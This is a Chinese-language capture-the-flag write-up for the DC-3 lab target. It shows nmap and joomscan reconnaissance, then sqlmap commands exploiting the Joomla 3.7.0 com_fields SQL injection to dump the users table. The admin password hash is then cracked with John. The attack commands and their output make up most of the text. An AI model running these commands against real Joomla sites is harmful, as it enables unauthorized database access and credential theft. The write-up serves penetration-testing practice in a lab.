DC-3
一、搜集信息
arp-scan -l查看同一区域中的主机
找到靶机
ip:192.168.3.159
tar@kali:~$ nmap -A 192.168.3.159 -p 1-65535
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-07 20:04 CST
Nmap scan report for 192.168.3.147
Host is up (0.0022s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home
信息
CMS:Joomla
ip:192.168.3.159
端口:80
二 、搜索漏洞
joomscan
joomscan -u 192.168.3.159
Processing http://192.168.3.159 ...
[+] FireWall Detector
[++] Firewall not detected
[+] Detecting Joomla Version
[++] Joomla 3.7.0
[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable
[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.3.159/administrator/components
http://192.168.3.159/administrator/modules
http://192.168.3.159/administrator/templates
http://192.168.3.159/images/banners
[+] Checking apache info/status files
[++] Readable info/status files are not found
[+] admin finder
[++] Admin page : http://192.168.3.159/administrator/
[+] Checking robots.txt existing
[++] robots.txt is not found
[+] Finding common backup files name
[++] Backup files are not found
[+] Finding common log files name
[++] error log is not found
[+] Checking sensitive config.php.x file
[++] Readable config files are not found
Your Report : reports/192.168.3.159/
版本:Joomla 3.7.0(百度这个版本,能知道有sql注入漏洞)
https://www.anquanke.com/post/id/86119
后台登录:http://192.168.3.159/administrator/
searchsploit工具
searchsploit Joomla 3.7.0
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt joomla_sql.txt
将漏洞信息保存到本地
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
获取了数据库
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent –current-db -p list[fullordering]
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D “joomladb” --tables -p list[fullordering]
#__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” --columns -p list[fullordering]
-D “joomladb” -T “#__users” --columns获取#_user 中的列名
-D “joomladb” -T “#__users” -C “name,password” --dump获取字段
sqlmap -u "http://192.168.3.159/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D “joomladb” -T “#__users” -C “name,password” --dump -p list[fullordering]
+-------+--------------------------------------------------------------+
| name | password |
+-------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+-------+--------------------------------------------------------------+
John解密:https://blog.csdn.net/boy_from_village/article/details/80383419
password:snoopy
后台登陆成功